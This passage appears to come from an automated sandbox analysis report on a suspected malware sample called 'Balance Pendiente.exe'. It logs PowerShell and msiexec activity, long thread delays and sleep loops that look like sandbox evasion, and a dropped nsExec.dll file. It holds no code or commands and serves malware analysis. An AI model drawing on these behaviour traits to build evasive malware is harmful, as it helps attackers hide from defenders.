            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598703Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598594Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598469Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598360Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598114Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597864Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597740Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597471Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597344Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595353Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595094Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594978Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594703Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594594Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593985Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5786Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3915Jump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu1A01.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2656Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -30437127721620741s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep count: 1151 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep count: 8672 > 30Jump to behavior
